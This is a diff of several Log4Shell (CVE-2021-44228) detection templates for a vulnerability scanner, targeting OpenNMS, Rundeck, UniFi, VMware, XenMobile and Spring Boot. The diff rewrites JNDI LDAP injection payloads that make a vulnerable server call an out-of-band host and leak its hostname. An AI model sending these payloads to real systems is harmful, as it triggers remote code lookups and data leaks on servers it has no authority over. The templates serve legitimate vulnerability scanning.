- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

16
http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml
View File

@ -22,6 +22,10 @@ info:
verified: "true"
tags: jndi,log4j,rce,opennms,cve,cve2021,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -29,7 +33,7 @@ http:
Referer: {{RootURL}}/opennms/login.jsp
Content-Type: application/x-www-form-urlencoded
j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&Login=&j_usergroups=
j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&j_password=password&Login=&j_usergroups=
matchers-condition: and
matchers:
@ -41,17 +45,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by cs on 2022/10/23

16
http/vulnerabilities/other/rundeck-log4j.yaml
View File

@ -20,6 +20,10 @@ info:
verified: "true"
tags: cve,cve2021,rce,jndi,log4j,rundeck,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -30,7 +34,7 @@ http:
Connection: close
Referer: {{BaseURL}}/user/login
j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin
j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&j_password=admin
matchers-condition: and
matchers:
@ -42,7 +46,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word
part: location
@ -54,8 +58,14 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

20
http/vulnerabilities/other/unifi-network-log4j-rce.yaml
View File

@ -22,6 +22,10 @@ info:
verified: "true"
tags: cve,cve2021,rce,log4j,ubnt,unifi,oast,jndi,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -31,7 +35,7 @@ http:
Origin: {{RootURL}}
Referer: {{RootURL}}/manage/account/login?redirect=%2Fmanage
{"username":"user","password":"pass","remember":"${jndi:ldap://${hostName}.{{interactsh-url}}}","strict":true}
{"username":"user","password":"pass","remember":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}","strict":true}
matchers-condition: and
matchers:
@ -43,13 +47,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/06/03

16
http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml
View File

@ -21,10 +21,14 @@ info:
verified: "true"
tags: cve,cve2021,jndi,log4j,rce,oast,vmware,siterecovery,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- method: GET
path:
- '{{BaseURL}}/dr/authentication/oauth2/oauth2login?error=%24%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.{{interactsh-url}}%7D'
- '{{BaseURL}}/dr/authentication/oauth2/oauth2login?error=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.uri.{{interactsh-url}}%7D'
matchers-condition: and
matchers:
@ -36,7 +40,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word
part: body
@ -48,8 +52,14 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

16
http/vulnerabilities/other/xenmobile-server-log4j.yaml
View File

@ -11,6 +11,10 @@ info:
shodan-query: title:"XenMobile"
tags: cve,cve2021,rce,jndi,log4j,xenmobile,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -23,7 +27,7 @@ http:
Origin: {{BaseURL}}
Referer: {{BaseURL}}/zdm/login_xdm_uc.jsp
login=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin
login=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&password=admin
matchers-condition: and
matchers:
@ -35,7 +39,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word
part: body
@ -47,8 +51,14 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

16
http/vulnerabilities/springboot/springboot-log4j-rce.yaml
View File

@ -20,12 +20,16 @@ info:
metadata:
max-request: 1
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
X-Api-Version: ${jndi:ldap://${hostName}.{{interactsh-url}}}
X-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}}
matchers-condition: and
matchers:
@ -37,17 +41,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/05/31

17
http/vulnerabilities/vmware/vmware-hcx-log4j.yaml
View File

@ -20,6 +20,10 @@ info:
verified: "true"
tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -32,7 +36,7 @@ http:
{
"authType": "password",
"username": "${jndi:ldap://${sys:os.name}.{{interactsh-url}}}",
"username": "${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}",
"password": "admin"
}
@ -46,16 +50,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2022/10/05

16
http/vulnerabilities/vmware/vmware-nsx-log4j.yaml
View File

@ -20,6 +20,10 @@ info:
verified: "true"
tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -30,7 +34,7 @@ http:
Origin: {{BaseURL}}
Referer: {{BaseURL}}/login.jsp
username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin&submit=
username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&password=admin&submit=
matchers-condition: and
matchers:
@ -42,7 +46,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word
part: location
@ -54,8 +58,14 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

16
http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml
View File

@ -20,6 +20,10 @@ info:
verified: "true"
tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -33,7 +37,7 @@ http:
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
mainAction=login&userName=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin&authSourceId=localItem&authSourceName=Local%20Users&authSourceType=LOCAL&forceLogin=&timezone=330&languageCode=us
mainAction=login&userName=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&password=admin&authSourceId=localItem&authSourceName=Local%20Users&authSourceType=LOCAL&forceLogin=&timezone=330&languageCode=us
matchers-condition: and
matchers:
@ -45,7 +49,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word
part: header
@ -57,8 +61,14 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

20
http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml
View File

@ -23,6 +23,10 @@ info:
verified: "true"
tags: cve,cve2021,oast,rce,log4j,vmware,vrealize,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -32,7 +36,7 @@ http:
Origin: {{RootURL}}
Referer: {{RootURL}}/ui/
{"username":"${jndi:ldap://${hostName}.{{interactsh-url}}}","password":"admin"}
{"username":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}","password":"admin"}
matchers-condition: and
matchers:
@ -44,13 +48,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/04/05